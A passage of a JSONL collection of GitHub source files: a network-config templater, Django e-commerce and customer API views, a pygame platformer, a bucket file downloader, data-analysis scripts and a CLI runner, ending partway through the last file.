+{"seq_id":"25612699650","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Dec 23 15:36:37 2019\n\n@author: Synophic\n\"\"\"\n\nimport jinja2\nimport csv\n\nconfig = 'config_template.j2'\n\nwith open(config) as e:\n    output = e.read()\n\n# Build the template once; it can be rendered for every CSV row.\nt = jinja2.Template(output)\n\ncsv_file = 'peyto_onboarding.csv'\nwith open(csv_file) as f:\n    read_csv = csv.DictReader(f)\n    for bgp_var in read_csv:\n        print('#'*80)\n        print(bgp_var['circle'] + ' PEYTO_IP ' + bgp_var['Loopback0_IP1'])\n        print('#'*80)\n        print(t.render(bgp_var))\n        with open('config_file.txt', 'a') as file:\n            file.write('#'*80 + \"\\n\")\n            file.write(bgp_var['circle'] + ' PEYTO_IP ' + bgp_var['Loopback0_IP1'] + \"\\n\")\n            file.write('#'*80 + \"\\n\")\n            file.write(t.render(bgp_var))\n","repo_name":"vikasvsnl/spyder-py3","sub_path":"Multiple_Peyto_Onboarding_config_creations.py","file_name":"Multiple_Peyto_Onboarding_config_creations.py","file_ext":"py","file_size_in_byte":803,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"15020881089","text":"from django.shortcuts import render\nfrom django.contrib.auth.decorators import login_required\nfrom django.views.decorators.http import require_POST\nfrom rest_framework.decorators import api_view\nfrom django.db import transaction\n\nfrom .serializers import OrderSerializer\nfrom cart.cart import Cart\nfrom social.models import Address, Product, OrderItems, Order\nfrom .tasks import order_confirmation_mail\n\nimport random\n# Create your views here.\n\n@api_view(['POST'])\n@login_required\ndef order_create(request):\n cart=Cart(request)\n user=request.user\n order_id=str(random.randrange(1000))\n \n address=Address.objects.filter(user=user)[0]\n data={\"order_id\":order_id, \"address\":address.id, \"buyer\":user.id, \"price\":1}\n order_srz=OrderSerializer(data=data)\n with transaction.atomic():\n order_srz.is_valid(raise_exception=True)\n order=order_srz.save()\n for item in cart:\n OrderItems.objects.create(\n order=order,\n product=item['product'],\n price=item['price'],\n quantity=item['quantity']\n )\n order.price=order.get_total_cost()\n order.save()\n order_confirmation_mail.delay(order.id)\n cart.clear()\n return render(request, 'orders/order_placed.html', {'order': order})\n\n\n@login_required\ndef checkout_page(request):\n cart=Cart(request)\n addresses=Address.objects.filter(user=request.user)\n return render(request,'orders/checkout_page.html',{'cart': cart, 'addresses': addresses})\n \n ","repo_name":"ravi98/ecommerce_cart","sub_path":"orders/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1547,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7123982645","text":"import httplib\nimport json\nimport logging\n\n__author__ = 'Nazzareno'\n\nfrom setting import static_variable\n\nclass Google_api_request:\n\n    @staticmethod\n    def request_place(latitude,longitude):\n\n        #url = 'https://maps.googleapis.com/maps/api/place/nearbysearch/json?location='\n        url = '/maps/api/place/nearbysearch/json?location='\n        url_place = url+latitude+\",\"+longitude\n        url_radius = url_place+\"&radius=\"+str(static_variable.google_radius)\n        url_type = url_radius+\"&types=\"+static_variable.google_types\n        my_key = \"key=\" + static_variable.google_api_key\n\n        conn = httplib.HTTPSConnection(\"maps.googleapis.com\")\n        conn.request(\"GET\", url_type+\"&\"+my_key)\n        r1 = conn.getresponse()\n\n        response = json.loads(r1.read())\n\n        if static_variable.DEBUG:\n            logging.debug(\"Status request google place --> \"+response[\"status\"])\n        if response[\"status\"] == \"OK\":\n            temp_result = response[\"results\"]\n            for temp in temp_result:\n                #logging.debug(temp)\n                if static_variable.DEBUG:\n                    logging.debug(str(temp[\"name\"])+\" is near\")\n                for value in temp[\"types\"]:\n                    if value == \"parking\":\n                        return 2\n                    elif value == \"train_station\" or value == \"subway_station\":\n                        return 1\n            return 1\n\n        else:\n            return 0","repo_name":"FamilyParking/Project","sub_path":"Server/Tool/google_api_request.py","file_name":"google_api_request.py","file_ext":"py","file_size_in_byte":1519,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"69"}
+{"seq_id":"11961140520","text":"import random\nfrom colorama import init, Fore\n\ninit()  # enable ANSI colours on Windows terminals\n\nwhile True:\n    print(random.randint(1, 6))\n    ROLL = input(Fore.BLUE + \"Want to roll the dice? (Yes/No): \")\n    if ROLL.capitalize() != \"Yes\":\n        break\nprint(\"Bye Bye Bye!!!\")\n","repo_name":"codingwithkien/Projects-Python-Programming","sub_path":"Dice_Rolling_Simulation/dice_rolling_simulation.py","file_name":"dice_rolling_simulation.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"17659486001","text":"from sklearn.manifold import TSNE\r\nfrom sklearn.datasets import load_iris\r\nfrom sklearn.decomposition import PCA\r\nimport matplotlib.pyplot as plt\r\nimport numpy as np\r\nimport scipy.io as sio\r\n#import input_data\r\nimport heapq as hpq\r\nimport pickle as pk\r\n\r\niris = load_iris()\r\nwith open(r'tsnedatawf.pkl','rb') as f:\r\n data_dic = pk.load(f)\r\n#print(data_dic)\r\na = data_dic['h_conv1_rsp']\r\na2 = data_dic['h_conv2_rsp']\r\na3 = data_dic['h_conv3_rsp']\r\nwa = data_dic['wf']\r\nlabel = data_dic['label']\r\npos_idx = label[:,0]==1\r\nprint(len(wa[0]))\r\nneg_idx = label[:,0]==0\r\nprint(len(wa))\r\n#print(a)\r\n\r\npos_data3 = []\r\nneg_data3 = []\r\nhfc = 0\r\nwfc = 1\r\ndata_tmp = []\r\nwww = []\r\nww = []\r\nfor j in range(len(wa[0])):\r\n www = []\r\n for i in range(len(wa)):\r\n data_tmp.append(wa[i][j])\r\n if((i+1)%60 == 0):\r\n www.append(data_tmp)\r\n #print(data_tmp)\r\n data_tmp = []\r\n ww.append(www)\r\n\r\nfor i in range(len(a3)):\r\n data_tmp = []\r\n for j in range(len(a3[0])):\r\n for k in range(len(a3[0][0])):\r\n data_tmp.append(a3[i][j][k])\r\n if(pos_idx[i]):\r\n pos_data3.append(list(data_tmp))\r\n else:\r\n neg_data3.append(list(data_tmp))\r\npos_data3 = np.array(pos_data3)\r\nneg_data3 = np.array(neg_data3)\r\nww = np.array(ww)\r\n#print(len(a3[0]))\r\n#print(len(pos_data3))\r\nsio.savemat('save_w', {'w':ww})\r\n\r\n'''\r\nif(wfc == 1):\r\n wl1 = list(wa[0:116,0])\r\n wl2 = list(wa[0:116,1])\r\n wafa = list(wafa[0,:])\r\n #wl1 = [abs(i) for i in wl1]\r\n #wl2 = [abs(i) for i in wl2]\r\n large_index = hpq.nlargest(25, wl1)\r\n aaa = [wl1.index(large_index[i])+1 for i in range(25)]\r\n print(hpq.nlargest(25,aaa))\r\n\r\n\r\n large_index = hpq.nlargest(25, wafa)\r\n aaa = [wafa.index(large_index[i])+1 for i in range(25)]\r\n print(hpq.nlargest(25,aaa))\r\n#print(type(data_tmp[0]))\r\n#print(type(data))\r\ndata = np.array(data)\r\n#(type(data))\r\n#print(data.shape)\r\n\r\n#print(list(label[:,0]))\r\nX_tsne = TSNE(learning_rate=100).fit_transform(data_dic['x'])\r\nX_pca = PCA().fit_transform(data)\r\nprint(len(wl1))\r\nplt.scatter([i for i in range(116)],wl1)\r\nplt.show()\r\n'''\r\n'''\r\nplt.figure(figsize=(10, 5))\r\nplt.subplot(121)\r\nplt.scatter(X_tsne[:, 0], X_tsne[:, 1], c=list(label[:,0]))\r\nplt.show()\r\n'''","repo_name":"BingchengMao/Graph-Classification-CNN","sub_path":"tsneFR.py","file_name":"tsneFR.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"13963928982","text":"#!/usr/bin/env python3\n\n\nfrom progress.bar import Bar\nimport requests\nimport urllib3\nimport time\n\n\n\nfrom downloader.dicts import *\n\n\n\nrequests.urllib3.disable_warnings()\ndef download(url, proxy, header):\n print(\" [+] Process started!\")\n bar = Bar (f\" [+] Files downloaded\",max=sum(ext_counts.values()), fill=\"█\")\n if proxy:\n if url.startswith(\"https://\"):\n proxy = {\"https\": proxy}\n elif url.startswith(\"http://\"):\n proxy = {\"http\": proxy}\n if header:\n header_name = header.split(\": \")[0]\n header_value = header.split(\": \")[1]\n headers = {header_name: header_value}\n else:\n headers = None\n for items in bigdata:\n print(\"\\r Working on it\", end=\"\"),bar.next()\n fille = items\n filename = fille.replace(\"/\", \"\")\n r = requests.get(url+fille, headers=headers, verify=False, proxies=proxy)\n if r.status_code != 200:\n failedones[fille] = failedones.get(fille, 0) + 1\n else:\n if filename[:1] == \".\":\n f = open(f\"files/{filename[1:]}\", \"wb\")\n f.write(r.content)\n f.close()\n else:\n f = open(f\"files/{filename}\", \"wb\")\n f.write(r.content)\n f.close() \n\n bar.finish()\n","repo_name":"S1ckAndTired/BucketList","sub_path":"downloader/writers.py","file_name":"writers.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"7218154110","text":"# -*- coding: utf-8 -*-\nfrom email.policy import default\nimport os\nimport sys\n\nimport pkgutil\nimport importlib\n\n\ndef import_submodules(package_name: str) -> None:\n importlib.invalidate_caches()\n sys.path.append(\".\")\n\n module = importlib.import_module(package_name)\n path = getattr(module, \"__path__\", [])\n path_string = \"\" if not path else path[0]\n\n for module_finder, name, _ in pkgutil.walk_packages(path):\n if path_string and module_finder.path != path_string:\n continue\n subpackage = f\"{package_name}.{name}\"\n import_submodules(subpackage)\n\n\nimport_submodules(\"src\")\nfrom src.utils.params import Params\nfrom src.utils.args_parser import Subcommand, ArgumentParserWithDefaults\n\n\ndef main(subcommand_overrides={}):\n parser = ArgumentParserWithDefaults()\n\n subparsers = parser.add_subparsers(title=\"Commands\", metavar=\"\")\n\n subcommands = {\n \"preprocess\": Preprocess(),\n \"train\": Train(),\n \"hyp_train\": HyperparamsSearchTraining(),\n \"hyp_recon\": HyperparamsSearchReconstruction(),\n \"eval\": Evaluate(),\n \"eval_kw\": EvaluateKW(),\n \"vis_sim\": VisualizeSimilarItems(),\n \"export\": ExportModel(),\n **subcommand_overrides\n }\n\n for name, subcommand in subcommands.items():\n subparser = subcommand.add_subparser(name, subparsers)\n if name != \"configure\":\n subparser.add_argument(\"--include-package\",\n type=str,\n action=\"append\",\n default=[],\n help=\"additional packages to include\")\n\n args = parser.parse_args()\n if \"func\" in dir(args):\n for package_name in getattr(args, \"include_package\", ()):\n import_submodules(package_name)\n args.func(args)\n else:\n parser.print_help()\n\n\nclass Preprocess(Subcommand):\n def add_subparser(self, name, subparsers):\n description = \"Run data preprocess\"\n subparser = subparsers.add_parser(name, description=description,\n help=description)\n\n subparser.add_argument(\n \"config_path\", type=str,\n help=\"path to the json config file\")\n subparser.add_argument(\n \"-f\", \"--force\", action=\"store_true\",\n help=\"force override serialization dir\")\n\n subparser.set_defaults(func=preprocess)\n return subparser\n\n\ndef preprocess(args):\n from src.data.preprocess import main as func\n return func(args.config_path, args.force)\n\n\nclass Train(Subcommand):\n def add_subparser(self, name, parser):\n description = \"\"\"Train the specified model on the specified dataset\"\"\"\n subparser = parser.add_parser(name, description=description,\n help=description)\n\n subparser.add_argument(\n \"config_path\", type=str,\n help=\"path to parameter file describing the model to be trained\")\n subparser.add_argument(\n \"dataset_path\", type=str,\n help=\"path to the training dataset\")\n subparser.add_argument(\n \"-s\", \"--save_dir\", type=str, default=\"\",\n help=\"directory in which to save the model and its logs\")\n subparser.add_argument(\n \"-r\", \"--recover\", action=\"store_true\",\n help=\"recover training from the state in serialization_dir\")\n subparser.add_argument(\n \"-f\", \"--force\", action=\"store_true\",\n help=\"force override serialization dir\")\n\n subparser.set_defaults(func=train_model)\n\n return subparser\n\n\ndef train_model(args):\n from src.train import train as func\n return func(args.config_path, args.dataset_path, args.save_dir, args.recover, args.force)\n\n\nclass HyperparamsSearchTraining(Subcommand):\n def add_subparser(self, name, subparsers):\n description = \"Run hyperparams search for training\"\n subparser = 
subparsers.add_parser(name, description=description,\n                                          help=description)\n\n        subparser.add_argument(\n            \"config_path\", type=str,\n            help=\"path to the json config file\")\n        subparser.add_argument(\n            \"dataset_path\", type=str,\n            help=\"path to the training dataset\")\n        subparser.add_argument(\n            \"-t\", \"--test_dataset_path\", type=str, default=None,\n            help=\"path to evaluate dataset\")\n        subparser.add_argument(\n            \"-a\", \"--additional_dataset_path\", type=str, default=None,\n            help=\"path to additional dataset\")\n        subparser.add_argument(\n            \"-n\", \"--num_trials\", type=int, default=100,\n            help=\"number of trials to run\")\n        subparser.add_argument(\n            \"-f\", \"--force\", action=\"store_true\",\n            help=\"force override serialization dir\")\n\n        subparser.set_defaults(func=hyperparams_search_training)\n        return subparser\n\n\ndef hyperparams_search_training(args):\n    from src.train import hyperparams_search_training as func\n    return func(args.config_path, args.dataset_path, args.test_dataset_path, args.additional_dataset_path,\n                args.num_trials, args.force)\n\n\nclass HyperparamsSearchReconstruction(Subcommand):\n    def add_subparser(self, name, subparsers):\n        description = \"Run hyperparams search for reconstruction\"\n        subparser = subparsers.add_parser(name, description=description,\n                                          help=description)\n\n        subparser.add_argument(\n            \"config_path\", type=str,\n            help=\"path to the json config file\")\n        subparser.add_argument(\n            \"checkpoint_dir\", type=str,\n            help=\"path to the trained model checkpoint\")\n        subparser.add_argument(\n            \"test_dataset_path\", type=str,\n            help=\"path to the test dataset\")\n        subparser.add_argument(\n            \"additional_dataset_path\", type=str,\n            help=\"path to additional dataset\")\n        subparser.add_argument(\n            \"-n\", \"--num_trials\", type=int, default=100,\n            help=\"number of trials to run\")\n\n        subparser.set_defaults(func=hyperparams_search_reconstruction)\n        return subparser\n\n\ndef hyperparams_search_reconstruction(args):\n    from src.train import hyperparams_search_reconstruction as func\n    return func(args.config_path, args.checkpoint_dir, args.test_dataset_path, args.additional_dataset_path,\n                args.num_trials)\n\n\nclass Evaluate(Subcommand):\n    def add_subparser(self, name, subparsers):\n        description = \"Run evaluation\"\n        subparser = subparsers.add_parser(name, description=description,\n                                          help=description)\n\n        subparser.add_argument(\n            \"checkpoint_path\", type=str,\n            help=(\"path to the model checkpoint\"))\n        subparser.add_argument(\n            \"-d\", \"--test_dataset_path\", type=str, default=None,\n            help=\"path to evaluate dataset\")\n        subparser.set_defaults(func=evaluate)\n        return subparser\n\n\ndef evaluate(args):\n    from src.train import test as func\n    return func(args.checkpoint_path, args.test_dataset_path)\n\n\nclass EvaluateKW(Subcommand):\n    def add_subparser(self, name, subparsers):\n        description = \"Run evaluation on kw\"\n        subparser = subparsers.add_parser(name, description=description,\n                                          help=description)\n\n        subparser.add_argument(\n            \"checkpoint_path\", type=str,\n            help=(\"path to the model checkpoint\"))\n        subparser.add_argument(\n            \"-d\", \"--test_dataset_path\", type=str, default=None,\n            help=\"path to evaluate dataset\")\n        subparser.add_argument(\n            \"-a\", \"--additional_dataset_path\", type=str, default=None,\n            help=\"path to additional dataset\")\n        subparser.add_argument(\n            \"-c\", \"--reconstruction_config\", type=str, default=None,\n            help=\"path to the reconstruction config\")\n        subparser.set_defaults(func=evaluate_kw)\n        return subparser\n\n\ndef 
evaluate_kw(args):\n from src.train import test_keyword as func\n return func(args.checkpoint_path, args.test_dataset_path, args.additional_dataset_path,\n args.reconstruction_config)\n\n\nclass VisualizeSimilarItems(Subcommand):\n def add_subparser(self, name, parser):\n description = \"\"\"Visualize similar item embeddings\"\"\"\n subparser = parser.add_parser(name, description=description,\n help=description)\n\n subparser.add_argument(\n \"checkpoint_path\", type=str, help=\"path to model checkpoint\")\n subparser.add_argument(\n \"-f\", \"--force\", action=\"store_true\", help=\"override the ann tree\")\n subparser.set_defaults(func=visualize_similar_items)\n\n return subparser\n\n\ndef visualize_similar_items(args):\n from src.visualization.visualize_embeddings import get_similar_items as func\n return func(args.checkpoint_path, args.force)\n\n\nclass ExportModel(Subcommand):\n def add_subparser(self, name, parser):\n description = \"\"\"Export model for serving\"\"\"\n subparser = parser.add_parser(name, description=description,\n help=description)\n\n subparser.add_argument(\n \"checkpoint_path\", type=str, help=\"path to model checkpoint\")\n subparser.add_argument(\n \"-o\", \"--output_dir\", type=str, help=\"path to output dir\")\n subparser.set_defaults(func=export_model)\n\n return subparser\n\n\ndef export_model(args):\n raise NotImplementedError()\n\n\ndef run():\n main()\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"thanhtcptit/deep-mf","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":9751,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"40552260193","text":"import pygame\nimport random\nfrom pixeljump.projectile import Projectile\nfrom pixeljump.settings import load_settings\nfrom pixeljump.assets import get_sprite_image, get_music\nfrom pixeljump.animations import load_animation, change_action\nfrom pixeljump.menu import pause_screen, win_screen1, win_screen2, win_screen3\nfrom pixeljump.die import Fade\nfrom pixeljump.particles import RocketParticles\n\n\nsettings = load_settings()\n\nTILE_SIZE = settings[\"window\"][\"tile_size\"]\nPLAYER_COLOR = settings[\"colors\"][\"player\"]\nFPS = settings[\"window\"][\"fps\"]\nPLAYER_HORIZONTAL_VEL = settings[\"player\"][\"horizontal_velocity\"]\nPLAYER_VERTICAL_VEL = settings[\"player\"][\"vertical_velocity\"]\nGRAVITY = settings[\"player\"][\"gravity\"]\n\n\nclass Player(pygame.sprite.Sprite):\n def __init__(\n self,\n position: tuple[int, int],\n *groups: pygame.sprite.Group,\n act: int,\n target: pygame.sprite.Sprite,\n collision_sprites: pygame.sprite.Group,\n visible_sprites: pygame.sprite.Group,\n active_sprites: pygame.sprite.Group,\n enemy_sprites: pygame.sprite.Group,\n can_shoot: bool = False\n ):\n super().__init__(*groups)\n self.health = 3\n self.heart_image = get_sprite_image(\"heart\", (TILE_SIZE, TILE_SIZE))\n self.image = get_sprite_image(\"KNIGHT\", (TILE_SIZE, TILE_SIZE), convert=False)\n self.rect = self.image.get_rect(center=position)\n self.mask = pygame.mask.from_surface(self.image)\n self.velocity = pygame.Vector2()\n self.enemy_sprites = enemy_sprites\n self.collision_sprites = collision_sprites\n self.visible_sprites = visible_sprites\n self.active_sprites = active_sprites\n self.target = target\n self.can_jump = True\n self.can_double_jump = True\n self.muted = False\n self.die = pygame.sprite.Group(Fade())\n self.dead = False\n self.orig_pos = position\n self.can_rocket = False\n self.rocket_timer = 70\n self.act = act\n self.rocket_acceleration = 0\n self.can_shoot = can_shoot\n\n # For animations\n self.animation_images: dict[str, pygame.Surface] = {}\n self.animation_database = {\n \"idle\": load_animation(\"idle\", [7, 7, 40], self.animation_images),\n \"running\": load_animation(\n \"running\", [7, 7, 7, 7, 7, 7, 7, 7], self.animation_images\n ),\n \"jumping\": load_animation(\"jumping\", [7], self.animation_images),\n }\n self.player_action = \"idle\"\n self.player_frame = 0\n self.player_flip = False\n\n # For audio\n self.jump_sound = get_music(\"jump.wav\")\n self.step_sound = [\n get_music(\"step0.wav\"),\n get_music(\"step1.wav\"),\n ]\n self.step_sound_timer = 0\n self.step_sound[0].set_volume(0.5)\n self.step_sound[1].set_volume(0.5)\n\n self.death_music = get_music(\"ded.wav\")\n self.death_music.set_volume(0.2)\n\n self.pause_in_sound = get_music(\"pause_in.wav\")\n self.falling_sound = get_music(\"falling.wav\")\n\n self.rocket_sound = get_music(\"rocket.wav\")\n self.rocket_sound_timer = 10\n\n self.end_act = False\n\n self.got_hit_cd = 0\n\n self.gravity = GRAVITY\n\n self.shoot_sound = get_music(\"projectile_player.wav\")\n\n def got_hit(self) -> bool:\n if self.got_hit_cd <= 0:\n self.health -= 1\n self.got_hit_cd = 2 * FPS\n return True\n return False\n\n def input(self):\n if self.dead:\n return\n\n if self.step_sound_timer > 0:\n self.step_sound_timer -= 1\n\n if self.rocket_sound_timer > 0:\n self.rocket_sound_timer -= 1\n\n keys = pygame.key.get_pressed()\n if keys[pygame.K_a]:\n self.velocity.x = -PLAYER_HORIZONTAL_VEL\n elif keys[pygame.K_d]:\n self.velocity.x = PLAYER_HORIZONTAL_VEL\n else:\n self.velocity.x = 
0\n\n        if keys[pygame.K_SPACE]:\n            if self.can_rocket and self.rocket_timer > 0:\n                if self.rocket_sound_timer == 0:\n                    self.rocket_sound.play()\n                    self.rocket_sound_timer = 10\n                self.rocket_acceleration -= 0.4\n                self.velocity.y += self.rocket_acceleration\n                if self.velocity.y < -10:\n                    self.velocity.y = -10\n                self.rocket_timer -= 1\n                RocketParticles(\n                    (self.rect.bottomleft[0] + 10, self.rect.bottomleft[1] - 10),\n                    (random.randint(0, 20) / 10 - 2, random.randint(0, 20) / 10),\n                    self.visible_sprites,\n                    self.active_sprites,\n                )\n\n                RocketParticles(\n                    (self.rect.bottomright[0] - 20, self.rect.bottomright[1] - 10),\n                    (random.randint(0, 20) / 10, random.randint(0, 20) / 10),\n                    self.visible_sprites,\n                    self.active_sprites,\n                )\n\n        for event in pygame.event.get():\n            if event.type == pygame.KEYDOWN:\n                if event.key == pygame.K_SPACE:\n                    if self.can_jump:\n                        self.velocity.y = -PLAYER_VERTICAL_VEL\n                        self.can_jump = False\n                        self.jump_sound.play()\n                    elif self.can_double_jump:\n                        self.velocity.y = -PLAYER_VERTICAL_VEL\n                        self.can_double_jump = False\n                        self.jump_sound.play()\n                    elif (\n                        not self.can_double_jump and not self.can_jump and self.act == 2\n                    ):\n                        self.can_rocket = True\n                        self.rocket_acceleration = 0\n                if event.key == pygame.K_ESCAPE:\n                    self.pause_in_sound.play()\n                    pause_screen()\n                if event.key == pygame.K_m:\n                    self.toggle_mute()\n                if self.can_shoot and event.key == pygame.K_p:\n                    self.shoot_sound.play()\n                    if not self.player_flip:\n                        Projectile(\n                            (self.rect.centerx, self.rect.centery - 10),\n                            self.visible_sprites,\n                            self.active_sprites,\n                            direction=\"left\" if self.player_flip else \"right\",\n                            collision_sprites=self.collision_sprites,\n                            enemy_sprites=self.enemy_sprites,\n                        )\n                    else:\n                        Projectile(\n                            (self.rect.centerx - 64, self.rect.centery - 10),\n                            self.visible_sprites,\n                            self.active_sprites,\n                            direction=\"left\" if self.player_flip else \"right\",\n                            collision_sprites=self.collision_sprites,\n                            enemy_sprites=self.enemy_sprites,\n                        )\n            if event.type == pygame.QUIT:\n                pygame.quit()\n                quit(0)\n\n    def toggle_mute(self) -> None:\n        if not self.muted:\n            self.step_sound[0].set_volume(0)\n            self.step_sound[1].set_volume(0)\n            self.jump_sound.set_volume(0)\n            pygame.mixer.music.pause()\n            self.muted = True\n        else:\n            self.step_sound[0].set_volume(0.5)\n            self.step_sound[1].set_volume(0.5)\n            self.jump_sound.set_volume(1)\n            pygame.mixer.music.unpause()\n            self.muted = False\n\n    def check_win(self) -> None:\n        assert self.target.rect is not None\n        if self.rect.colliderect(self.target.rect):\n            self.target.win_sound.play()\n            self.end_act = True\n            if self.act == 1:\n                win_screen1()\n            elif self.act == 2 and not self.can_shoot:\n                win_screen2()\n            elif self.act == 2 and self.can_shoot:\n                win_screen3()\n\n    def animation(self):\n        if self.velocity.x > 0:\n            self.player_action, self.player_frame = change_action(\n                self.player_action, self.player_frame, \"running\"\n            )\n            self.player_flip = False\n\n        if self.velocity.x == 0 and self.velocity.y == 0:\n            self.player_action, self.player_frame = change_action(\n                self.player_action, self.player_frame, \"idle\"\n            )\n\n        if self.velocity.x < 0:\n            self.player_action, self.player_frame = change_action(\n                self.player_action, self.player_frame, \"running\"\n            )\n            self.player_flip = True\n\n        if self.can_rocket:\n            self.player_action, self.player_frame = change_action(\n                self.player_action, self.player_frame, \"jumping\"\n            )\n\n    def animating_image(self):\n        self.player_frame += 1\n        if self.player_frame >= len(self.animation_database[self.player_action]):\n            self.player_frame = 0\n        player_img_id = 
self.animation_database[self.player_action][self.player_frame]\n player_image = self.animation_images[player_img_id]\n self.image = pygame.transform.flip(player_image, self.player_flip, False)\n self.mask = pygame.mask.from_surface(self.image)\n\n def horizontal_collisions(self):\n for sprite in self.collision_sprites.sprites():\n if self.rect is not None and sprite.rect is not None:\n if sprite.rect.colliderect(self.rect):\n if self.velocity.x < 0:\n self.rect.left = sprite.rect.right\n if self.velocity.x > 0:\n self.rect.right = sprite.rect.left\n\n def vertical_collisions(self):\n for sprite in self.collision_sprites.sprites():\n if self.rect is not None and sprite.rect is not None:\n if sprite.rect.colliderect(self.rect):\n if self.velocity.y < 0:\n self.rect.top = sprite.rect.bottom\n self.velocity.y = 0\n if self.velocity.y > 0:\n self.rect.bottom = sprite.rect.top\n self.velocity.y = 0\n self.can_jump = True\n self.can_double_jump = True\n self.can_rocket = False\n self.rocket_timer = 70\n self.rocket_acceleration = 0\n if self.velocity.x != 0:\n if self.step_sound_timer == 0:\n self.step_sound_timer = 30\n random.choice(self.step_sound).play()\n\n def apply_gravity(self):\n self.velocity.y += self.gravity\n self.rect.y += self.velocity.y\n\n def check_alive(self):\n if self.rect.y > pygame.display.get_window_size()[1] * 2:\n self.falling_sound.play()\n self.player_die()\n\n def player_die(self) -> None:\n curr = pygame.time.get_ticks()\n end = curr + (3 * 1000)\n self.dead = True\n self.velocity = pygame.Vector2((0, 0))\n window = pygame.display.get_surface()\n font = pygame.font.SysFont(\"comicsans\", 50, bold=True)\n text = font.render(\"YOU DIED\", True, pygame.Color(\"red\"))\n pygame.mixer.music.stop()\n self.death_music.play()\n clock = pygame.time.Clock()\n while curr < end:\n self.die.update()\n self.die.draw(window)\n window.blit(\n text,\n (\n window.get_width() // 2 - text.get_width() // 2,\n window.get_height() // 2 - text.get_height() // 2,\n ),\n )\n curr = pygame.time.get_ticks()\n pygame.display.update()\n clock.tick(10)\n self.death_music.stop()\n self.kill()\n # self.dead = False\n # self.health = 3\n # self.rect.topleft = self.orig_pos\n # pygame.mixer.music.play()\n\n def draw_health(self) -> None:\n window = pygame.display.get_surface()\n for i in range(self.health):\n window.blit(\n self.heart_image,\n (window.get_width() - ((i + 1) * TILE_SIZE * 1.15), 10),\n )\n\n def update(self):\n self.input()\n self.animation()\n self.animating_image()\n self.rect.x += int(self.velocity.x)\n self.horizontal_collisions()\n self.apply_gravity()\n self.vertical_collisions()\n # self.check_alive()\n self.check_win()\n if self.got_hit_cd > 0:\n self.got_hit_cd -= 1\n self.draw_health()\n","repo_name":"WilsonOh/Orbital21-22-PixelJump-5215","sub_path":"src/pixeljump/player.py","file_name":"player.py","file_ext":"py","file_size_in_byte":12844,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"69"}
+{"seq_id":"43409285040","text":"import logging\n\nfrom django.core.cache import caches\n\nfrom rest_framework import mixins, viewsets\nfrom rest_framework.serializers import ValidationError\nfrom rest_framework.settings import api_settings\nfrom vng_api_common.permissions import AuthScopesRequired\nfrom vng_api_common.viewsets import CheckQueryParamsMixin\n\nfrom kic.datamodel.models import (\n ContactMoment,\n Klant,\n ObjectContactMoment,\n VerzoekContactMoment,\n VerzoekInformatieObject,\n VerzoekProduct,\n)\nfrom kic.datamodel.models.core import ObjectVerzoek, Verzoek\n\nfrom .filters import (\n ObjectContactMomentFilter,\n ObjectVerzoekFilter,\n VerzoekContactMomentFilter,\n VerzoekInformatieObjectFilter,\n VerzoekProductFilter,\n)\nfrom .scopes import (\n SCOPE_KLANTEN_AANMAKEN,\n SCOPE_KLANTEN_ALLES_LEZEN,\n SCOPE_KLANTEN_ALLES_VERWIJDEREN,\n SCOPE_KLANTEN_BIJWERKEN,\n)\nfrom .serializers import (\n ContactMomentSerializer,\n KlantSerializer,\n ObjectContactMomentSerializer,\n ObjectVerzoekSerializer,\n VerzoekContactMomentSerializer,\n VerzoekInformatieObjectSerializer,\n VerzoekProductSerializer,\n VerzoekSerializer,\n)\nfrom .validators import (\n ObjectContactMomentDestroyValidator,\n ObjectVerzoekDestroyValidator,\n)\n\nlogger = logging.getLogger(__name__)\n\n\nclass KlantViewSet(viewsets.ModelViewSet):\n \"\"\"\n Opvragen en bewerken van KLANTen.\n\n Een KLANT is een eenvoudige weergave van een NATUURLIJK PERSOON of\n VESTIGING waarbij het gaat om niet geverifieerde gegevens. Om deze reden\n zijn ook alle attributen optioneel.\n\n Indien de KLANT geverifieerd is mag een relatie gelegd worden met een\n NATUURLIJK PERSOON of VESTIGING middels het attribuut `subject` of, indien\n er geen API beschikbaar is voor deze objecten, middels\n `subjectIdentificatie`.\n\n create:\n Maak een KLANT aan.\n\n Maak een KLANT aan.\n\n list:\n Alle KLANTen opvragen.\n\n Alle KLANTen opvragen.\n\n retrieve:\n Een specifiek KLANT opvragen.\n\n Een specifiek KLANT opvragen.\n\n update:\n Werk een KLANT in zijn geheel bij.\n\n Werk een KLANT in zijn geheel bij.\n\n partial_update:\n Werk een KLANT deels bij.\n\n Werk een KLANT deels bij.\n\n destroy:\n Verwijder een KLANT.\n\n Verwijder een KLANT.\n \"\"\"\n\n queryset = Klant.objects.all()\n serializer_class = KlantSerializer\n lookup_field = \"uuid\"\n permission_classes = (AuthScopesRequired,)\n required_scopes = {\n \"list\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"retrieve\": SCOPE_KLANTEN_ALLES_LEZEN,\n \"create\": SCOPE_KLANTEN_AANMAKEN,\n \"update\": SCOPE_KLANTEN_BIJWERKEN,\n \"partial_update\": SCOPE_KLANTEN_BIJWERKEN,\n \"destroy\": SCOPE_KLANTEN_ALLES_VERWIJDEREN,\n }\n\n\nclass ContactMomentViewSet(viewsets.ModelViewSet):\n \"\"\"\n Opvragen en bewerken van CONTACTMOMENTen.\n\n create:\n Maak een CONTACTMOMENT aan.\n\n Maak een CONTACTMOMENT aan.\n\n list:\n Alle CONTACTMOMENTen opvragen.\n\n Alle CONTACTMOMENTen opvragen.\n\n retrieve:\n Een 